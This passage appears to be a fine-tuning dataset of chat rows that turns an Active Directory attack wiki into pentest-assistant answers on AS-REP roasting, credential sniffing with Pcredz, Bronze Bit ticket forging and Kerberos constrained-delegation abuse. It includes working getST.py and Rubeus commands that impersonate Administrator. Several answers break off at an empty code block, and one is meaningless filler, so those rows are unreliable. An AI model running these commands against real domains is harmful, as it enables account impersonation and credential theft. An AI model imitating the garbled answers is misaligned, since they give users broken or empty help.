tools or conditions are involved."}, {"role": "user", "content": "Explain ASREProast - ASREProast MitM"}, {"role": "assistant", "content": "Another way to conduct AS-REP roasting, without relying on Kerberos pre-authentication being disabled, would be to have a man-in-the-middle position on the network and catch AS-REPs. ASRepCatcher (Python) can be used for that purpose. It also has the ability to force client workstations to use RC4 (weaker encryption type) by altering the Kerberos negotiation process. The tool natively uses ARP spoofing (which can be disabled if needed).\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain ASREProast - ASREProast MitM", "response": "Another way to conduct AS-REP roasting, without relying on Kerberos pre-authentication being disabled, would be to have a man-in-the-middle position on the network and catch AS-REPs. ASRepCatcher (Python) can be used for that purpose. It also has the ability to force client workstations to use RC4 (weaker encryption type) by altering the Kerberos negotiation process. The tool natively uses ARP spoofing (which can be disabled if needed).\n\n```bash", "metadata": {"corpus_index": 509, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for ASREProast - ASREProast MitM"}, {"role": "assistant", "content": "Another way to conduct AS-REP roasting, without relying on Kerberos pre-authentication being disabled, would be to have a man-in-the-middle position on the network and catch AS-REPs. ASRepCatcher (Python) can be used for that purpose. It also has the ability to force client workstations to use RC4 (weaker encryption type) by altering the Kerberos negotiation process. The tool natively uses ARP spoofing (which can be disabled if needed).\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for ASREProast - ASREProast MitM", "response": "Another way to conduct AS-REP roasting, without relying on Kerberos pre-authentication being disabled, would be to have a man-in-the-middle position on the network and catch AS-REPs. ASRepCatcher (Python) can be used for that purpose. It also has the ability to force client workstations to use RC4 (weaker encryption type) by altering the Kerberos negotiation process. The tool natively uses ARP spoofing (which can be disabled if needed).\n\n```bash", "metadata": {"corpus_index": 509, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of ASREQroast - Practice"}, {"role": "assistant", "content": "Once network traffic is hijacked and goes through an attacker-controlled equipement, valuable information can searched through captured (with tcpdump, tshark or wireshark) or through live traffic.\n\nPCredz (Python) is a good example and allows extraction of credit card numbers, NTLM (DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of ASREQroast - Practice", "response": "Once network traffic is hijacked and goes through an attacker-controlled equipement, valuable information can searched through captured (with tcpdump, tshark or wireshark) or through live traffic.\n\nPCredz (Python) is a good example and allows extraction of credit card numbers, NTLM (DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\n\n```bash", "metadata": {"corpus_index": 510, "category": "network", "source_file": "docs/src/ad/movement/kerberos/asreqroast.md", "page_title": "ASREQroast", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through ASREQroast - Practice"}, {"role": "assistant", "content": "Once network traffic is hijacked and goes through an attacker-controlled equipement, valuable information can searched through captured (with tcpdump, tshark or wireshark) or through live traffic.\n\nPCredz (Python) is a good example and allows extraction of credit card numbers, NTLM (DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through ASREQroast - Practice", "response": "Once network traffic is hijacked and goes through an attacker-controlled equipement, valuable information can searched through captured (with tcpdump, tshark or wireshark) or through live traffic.\n\nPCredz (Python) is a good example and allows extraction of credit card numbers, NTLM (DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\n\n```bash", "metadata": {"corpus_index": 510, "category": "network", "source_file": "docs/src/ad/movement/kerberos/asreqroast.md", "page_title": "ASREQroast", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of extract credentials from a live packet capture on a network interface"}, {"role": "assistant", "content": "Pcredz -i $INTERFACE -v\n```\n\nCaptured encrypted timestamps can then be cracked with hashcat (C), mode 7500.\n\n> [!TIP]\n> Read the Cracking article for more insight"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of extract credentials from a live packet capture on a network interface", "response": "Pcredz -i $INTERFACE -v\n```\n\nCaptured encrypted timestamps can then be cracked with hashcat (C), mode 7500.\n\n> [!TIP]\n> Read the Cracking article for more insight", "metadata": {"corpus_index": 511, "category": "network", "source_file": "docs/src/ad/movement/kerberos/asreqroast.md", "page_title": "ASREQroast", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out extract credentials from a live packet capture on a network interface during a pentest?"}, {"role": "assistant", "content": "Pcredz -i $INTERFACE -v\n```\n\nCaptured encrypted timestamps can then be cracked with hashcat (C), mode 7500.\n\n> [!TIP]\n> Read the Cracking article for more insight"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out extract credentials from a live packet capture on a network interface during a pentest?", "response": "Pcredz -i $INTERFACE -v\n```\n\nCaptured encrypted timestamps can then be cracked with hashcat (C), mode 7500.\n\n> [!TIP]\n> Read the Cracking article for more insight", "metadata": {"corpus_index": 511, "category": "network", "source_file": "docs/src/ad/movement/kerberos/asreqroast.md", "page_title": "ASREQroast", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Bronze Bit - Theory?"}, {"role": "assistant", "content": "When abusing Kerberos delegations, S4U extensions usually come into play. One of those extensions is S4U2proxy. Constrained and Resource-Based Constrained delegations rely on that extensions. A requirement to be able to use S4U2proxy is to use an additional service ticket as evidence (usually issued by after S4U2self request). That ticket needs to have the forwardable flag set. There are a few reasons why that flag wouldn't be set on a ticket\n\n* the \"impersonated\" user was member of the \"Protected Users\" group or was configured as \"sensitive for delegation\"\n* the service account configured for constrained delegation was configured for Kerberos only/without protocol transition\n\nIn 2020, the \"bronze bit\" (CVE-2020-17049) was released, allowing attackers to edit a ticket and set the forwardable flag."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Bronze Bit - Theory?", "response": "When abusing Kerberos delegations, S4U extensions usually come into play. One of those extensions is S4U2proxy. Constrained and Resource-Based Constrained delegations rely on that extensions. A requirement to be able to use S4U2proxy is to use an additional service ticket as evidence (usually issued by after S4U2self request). That ticket needs to have the forwardable flag set. There are a few reasons why that flag wouldn't be set on a ticket\n\n* the \"impersonated\" user was member of the \"Protected Users\" group or was configured as \"sensitive for delegation\"\n* the service account configured for constrained delegation was configured for Kerberos only/without protocol transition\n\nIn 2020, the \"bronze bit\" (CVE-2020-17049) was released, allowing attackers to edit a ticket and set the forwardable flag.", "metadata": {"corpus_index": 512, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/bronze-bit.md", "page_title": "Bronze Bit", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Bronze Bit - Theory during a pentest?"}, {"role": "assistant", "content": "When abusing Kerberos delegations, S4U extensions usually come into play. One of those extensions is S4U2proxy. Constrained and Resource-Based Constrained delegations rely on that extensions. A requirement to be able to use S4U2proxy is to use an additional service ticket as evidence (usually issued by after S4U2self request). That ticket needs to have the forwardable flag set. There are a few reasons why that flag wouldn't be set on a ticket\n\n* the \"impersonated\" user was member of the \"Protected Users\" group or was configured as \"sensitive for delegation\"\n* the service account configured for constrained delegation was configured for Kerberos only/without protocol transition\n\nIn 2020, the \"bronze bit\" (CVE-2020-17049) was released, allowing attackers to edit a ticket and set the forwardable flag."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Bronze Bit - Theory during a pentest?", "response": "When abusing Kerberos delegations, S4U extensions usually come into play. One of those extensions is S4U2proxy. Constrained and Resource-Based Constrained delegations rely on that extensions. A requirement to be able to use S4U2proxy is to use an additional service ticket as evidence (usually issued by after S4U2self request). That ticket needs to have the forwardable flag set. There are a few reasons why that flag wouldn't be set on a ticket\n\n* the \"impersonated\" user was member of the \"Protected Users\" group or was configured as \"sensitive for delegation\"\n* the service account configured for constrained delegation was configured for Kerberos only/without protocol transition\n\nIn 2020, the \"bronze bit\" (CVE-2020-17049) was released, allowing attackers to edit a ticket and set the forwardable flag.", "metadata": {"corpus_index": 512, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/bronze-bit.md", "page_title": "Bronze Bit", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Bronze Bit - Practice?"}, {"role": "assistant", "content": "The Impacket script getST (Python) can perform all the necessary steps to edit a ticket's flags and obtain a ticket through S4U2proxy to act as another user on a target service (in this case, \"Administrator\" is impersonated/delegated account but it can be any user in the environment).\n\nThe input credentials are those of the compromised service account configured for constrained delegations.\n\n``bash\ngetST.py -force-forwardable -spn \"$Target_SPN\" -impersonate \"Administrator\" -dc-ip \"$DC_HOST\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"$USER\"\n`\n\nThe SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain` will allow most remote dumping operations (more info on adsecurity.org)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Bronze Bit - Practice?", "response": "The Impacket script getST (Python) can perform all the necessary steps to edit a ticket's flags and obtain a ticket through S4U2proxy to act as another user on a target service (in this case, \"Administrator\" is impersonated/delegated account but it can be any user in the environment).\n\nThe input credentials are those of the compromised service account configured for constrained delegations.\n\n``bash\ngetST.py -force-forwardable -spn \"$Target_SPN\" -impersonate \"Administrator\" -dc-ip \"$DC_HOST\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"$USER\"\n`\n\nThe SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain` will allow most remote dumping operations (more info on adsecurity.org).", "metadata": {"corpus_index": 513, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/bronze-bit.md", "page_title": "Bronze Bit", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Bronze Bit - Practice?"}, {"role": "assistant", "content": "The Impacket script getST (Python) can perform all the necessary steps to edit a ticket's flags and obtain a ticket through S4U2proxy to act as another user on a target service (in this case, \"Administrator\" is impersonated/delegated account but it can be any user in the environment).\n\nThe input credentials are those of the compromised service account configured for constrained delegations.\n\n``bash\ngetST.py -force-forwardable -spn \"$Target_SPN\" -impersonate \"Administrator\" -dc-ip \"$DC_HOST\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"$USER\"\n`\n\nThe SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain` will allow most remote dumping operations (more info on adsecurity.org)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Bronze Bit - Practice?", "response": "The Impacket script getST (Python) can perform all the necessary steps to edit a ticket's flags and obtain a ticket through S4U2proxy to act as another user on a target service (in this case, \"Administrator\" is impersonated/delegated account but it can be any user in the environment).\n\nThe input credentials are those of the compromised service account configured for constrained delegations.\n\n``bash\ngetST.py -force-forwardable -spn \"$Target_SPN\" -impersonate \"Administrator\" -dc-ip \"$DC_HOST\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"$USER\"\n`\n\nThe SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain` will allow most remote dumping operations (more info on adsecurity.org).", "metadata": {"corpus_index": 513, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/bronze-bit.md", "page_title": "Bronze Bit", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the getST.py command to bronze bit - practice"}, {"role": "assistant", "content": "getST.py -force-forwardable -spn \"$Target_SPN\" -impersonate \"Administrator\" -dc-ip \"$DC_HOST\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"$USER\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the getST.py command to bronze bit - practice", "response": "getST.py -force-forwardable -spn \"$Target_SPN\" -impersonate \"Administrator\" -dc-ip \"$DC_HOST\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"$USER\"", "metadata": {"corpus_index": 514, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/bronze-bit.md", "page_title": "Bronze Bit", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "getST.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Bronze Bit - Practice?"}, {"role": "assistant", "content": "getST.py -force-forwardable -spn \"$Target_SPN\" -impersonate \"Administrator\" -dc-ip \"$DC_HOST\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"$USER\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Bronze Bit - Practice?", "response": "getST.py -force-forwardable -spn \"$Target_SPN\" -impersonate \"Administrator\" -dc-ip \"$DC_HOST\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"$USER\"", "metadata": {"corpus_index": 514, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/bronze-bit.md", "page_title": "Bronze Bit", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `getST.py -force-forwardable -spn \"$Target_SPN\" -impersonate \"Administrator\" -dc-ip \"$DC_HOST\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"$USER\"`?"}, {"role": "assistant", "content": "This command is used for bronze bit - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `getST.py -force-forwardable -spn \"$Target_SPN\" -impersonate \"Administrator\" -dc-ip \"$DC_HOST\" -hashes :\"$NT_HASH\" \"$DOMAIN\"/\"$USER\"`?", "response": "This command is used for bronze bit - practice. Practice", "metadata": {"corpus_index": 514, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/bronze-bit.md", "page_title": "Bronze Bit", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is (KCD) Constrained - Theory?"}, {"role": "assistant", "content": "If a service account, configured with constrained delegation to another service, is compromised, an attacker can impersonate any user (e.g. domain admin, except users protected against delegation) in the environment to access another service the initial one can delegate to.\n\n> [!WARNING]\n> If the \"impersonated\" account is \"is sensitive and cannot be delegated\" or a member of the \"Protected Users\" group, the delegation will fail.\n\n> [!TIP]\n> The native, RID 500, \"Administrator\" account doesn't benefit from that restriction, even if it's added to the Protected Users group (source: sensepost.com).\n\nConstrained delegation can be configured with or without protocol transition. Abuse methodology differs for each scenario. The paths differ but the result is the same: a Service Ticket to authenticate on a target service on behalf of a user.\n\nOnce the final Service Ticket is obtained, it can be used with Pass-the-Ticket to access the target service. \n\n> [!TIP]\n> On a side note, a technique called AnySPN or \"service class modification\" can be used concurrently with pass-the-ticket to change the service class the Service Ticket was destined to (e.g. for the cifs/target.domain.local SPN, the service class is cifs).\n\n![]()"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is (KCD) Constrained - Theory?", "response": "If a service account, configured with constrained delegation to another service, is compromised, an attacker can impersonate any user (e.g. domain admin, except users protected against delegation) in the environment to access another service the initial one can delegate to.\n\n> [!WARNING]\n> If the \"impersonated\" account is \"is sensitive and cannot be delegated\" or a member of the \"Protected Users\" group, the delegation will fail.\n\n> [!TIP]\n> The native, RID 500, \"Administrator\" account doesn't benefit from that restriction, even if it's added to the Protected Users group (source: sensepost.com).\n\nConstrained delegation can be configured with or without protocol transition. Abuse methodology differs for each scenario. The paths differ but the result is the same: a Service Ticket to authenticate on a target service on behalf of a user.\n\nOnce the final Service Ticket is obtained, it can be used with Pass-the-Ticket to access the target service. \n\n> [!TIP]\n> On a side note, a technique called AnySPN or \"service class modification\" can be used concurrently with pass-the-ticket to change the service class the Service Ticket was destined to (e.g. for the cifs/target.domain.local SPN, the service class is cifs).\n\n![]()", "metadata": {"corpus_index": 515, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out (KCD) Constrained - Theory during a pentest?"}, {"role": "assistant", "content": "If a service account, configured with constrained delegation to another service, is compromised, an attacker can impersonate any user (e.g. domain admin, except users protected against delegation) in the environment to access another service the initial one can delegate to.\n\n> [!WARNING]\n> If the \"impersonated\" account is \"is sensitive and cannot be delegated\" or a member of the \"Protected Users\" group, the delegation will fail.\n\n> [!TIP]\n> The native, RID 500, \"Administrator\" account doesn't benefit from that restriction, even if it's added to the Protected Users group (source: sensepost.com).\n\nConstrained delegation can be configured with or without protocol transition. Abuse methodology differs for each scenario. The paths differ but the result is the same: a Service Ticket to authenticate on a target service on behalf of a user.\n\nOnce the final Service Ticket is obtained, it can be used with Pass-the-Ticket to access the target service. \n\n> [!TIP]\n> On a side note, a technique called AnySPN or \"service class modification\" can be used concurrently with pass-the-ticket to change the service class the Service Ticket was destined to (e.g. for the cifs/target.domain.local SPN, the service class is cifs).\n\n![]()"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out (KCD) Constrained - Theory during a pentest?", "response": "If a service account, configured with constrained delegation to another service, is compromised, an attacker can impersonate any user (e.g. domain admin, except users protected against delegation) in the environment to access another service the initial one can delegate to.\n\n> [!WARNING]\n> If the \"impersonated\" account is \"is sensitive and cannot be delegated\" or a member of the \"Protected Users\" group, the delegation will fail.\n\n> [!TIP]\n> The native, RID 500, \"Administrator\" account doesn't benefit from that restriction, even if it's added to the Protected Users group (source: sensepost.com).\n\nConstrained delegation can be configured with or without protocol transition. Abuse methodology differs for each scenario. The paths differ but the result is the same: a Service Ticket to authenticate on a target service on behalf of a user.\n\nOnce the final Service Ticket is obtained, it can be used with Pass-the-Ticket to access the target service. \n\n> [!TIP]\n> On a side note, a technique called AnySPN or \"service class modification\" can be used concurrently with pass-the-ticket to change the service class the Service Ticket was destined to (e.g. for the cifs/target.domain.local SPN, the service class is cifs).\n\n![]()", "metadata": {"corpus_index": 515, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of (KCD) Constrained - With protocol transition"}, {"role": "assistant", "content": "![]()\nDomain Controller > Active Directory Users and Computers > delegation properties of a user{.caption}\n\nIf a service is configured with constrained delegation with protocol transition, then it can obtain a service ticket on behalf of a user by combining S4U2self and S4U2proxy requests, as long as the user is not sensitive for delegation, or a member of the \"Protected Users\" group. The service ticket can then be used with pass-the-ticket. This process is similar to resource-based contrained delegation exploitation.\n\n> [!TIP]\n> See the rbcd.md article for more insight.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getST (Python) script can be used for that purpose.\n\n``bash\ngetST -spn \"cifs/target\" -impersonate \"Administrator\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"\n`\n\n> [!TIP]\n> `\n> [-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)\n> [-] Probably SPN is not allowed to delegate by user user1 or initial TGT not forwardable\n> `\n> \n> When attempting to exploit that technique, if the error above triggers, it means that either\n> \n> * the account was sensitive for delegation, or a member of the \"Protected Users\" group.\n> * or the constrained delegations are configured without protocol transition\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used to conduct a full S4U2 attack (S4U2self + S4U2proxy).\n\n`powershell\nRubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /domain:\"domain\" /user:\"user\" /password:\"password\"\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of (KCD) Constrained - With protocol transition", "response": "![]()\nDomain Controller > Active Directory Users and Computers > delegation properties of a user{.caption}\n\nIf a service is configured with constrained delegation with protocol transition, then it can obtain a service ticket on behalf of a user by combining S4U2self and S4U2proxy requests, as long as the user is not sensitive for delegation, or a member of the \"Protected Users\" group. The service ticket can then be used with pass-the-ticket. This process is similar to resource-based contrained delegation exploitation.\n\n> [!TIP]\n> See the rbcd.md article for more insight.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getST (Python) script can be used for that purpose.\n\n``bash\ngetST -spn \"cifs/target\" -impersonate \"Administrator\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"\n`\n\n> [!TIP]\n> `\n> [-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)\n> [-] Probably SPN is not allowed to delegate by user user1 or initial TGT not forwardable\n> `\n> \n> When attempting to exploit that technique, if the error above triggers, it means that either\n> \n> * the account was sensitive for delegation, or a member of the \"Protected Users\" group.\n> * or the constrained delegations are configured without protocol transition\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used to conduct a full S4U2 attack (S4U2self + S4U2proxy).\n\n`powershell\nRubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /domain:\"domain\" /user:\"user\" /password:\"password\"\n``\n\n:::", "metadata": {"corpus_index": 516, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do (KCD) Constrained - With protocol transition"}, {"role": "assistant", "content": "![]()\nDomain Controller > Active Directory Users and Computers > delegation properties of a user{.caption}\n\nIf a service is configured with constrained delegation with protocol transition, then it can obtain a service ticket on behalf of a user by combining S4U2self and S4U2proxy requests, as long as the user is not sensitive for delegation, or a member of the \"Protected Users\" group. The service ticket can then be used with pass-the-ticket. This process is similar to resource-based contrained delegation exploitation.\n\n> [!TIP]\n> See the rbcd.md article for more insight.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getST (Python) script can be used for that purpose.\n\n``bash\ngetST -spn \"cifs/target\" -impersonate \"Administrator\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"\n`\n\n> [!TIP]\n> `\n> [-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)\n> [-] Probably SPN is not allowed to delegate by user user1 or initial TGT not forwardable\n> `\n> \n> When attempting to exploit that technique, if the error above triggers, it means that either\n> \n> * the account was sensitive for delegation, or a member of the \"Protected Users\" group.\n> * or the constrained delegations are configured without protocol transition\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used to conduct a full S4U2 attack (S4U2self + S4U2proxy).\n\n`powershell\nRubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /domain:\"domain\" /user:\"user\" /password:\"password\"\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do (KCD) Constrained - With protocol transition", "response": "![]()\nDomain Controller > Active Directory Users and Computers > delegation properties of a user{.caption}\n\nIf a service is configured with constrained delegation with protocol transition, then it can obtain a service ticket on behalf of a user by combining S4U2self and S4U2proxy requests, as long as the user is not sensitive for delegation, or a member of the \"Protected Users\" group. The service ticket can then be used with pass-the-ticket. This process is similar to resource-based contrained delegation exploitation.\n\n> [!TIP]\n> See the rbcd.md article for more insight.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getST (Python) script can be used for that purpose.\n\n``bash\ngetST -spn \"cifs/target\" -impersonate \"Administrator\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"\n`\n\n> [!TIP]\n> `\n> [-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)\n> [-] Probably SPN is not allowed to delegate by user user1 or initial TGT not forwardable\n> `\n> \n> When attempting to exploit that technique, if the error above triggers, it means that either\n> \n> * the account was sensitive for delegation, or a member of the \"Protected Users\" group.\n> * or the constrained delegations are configured without protocol transition\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used to conduct a full S4U2 attack (S4U2self + S4U2proxy).\n\n`powershell\nRubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /domain:\"domain\" /user:\"user\" /password:\"password\"\n``\n\n:::", "metadata": {"corpus_index": 516, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the getST syntax for (kcd) constrained - with protocol 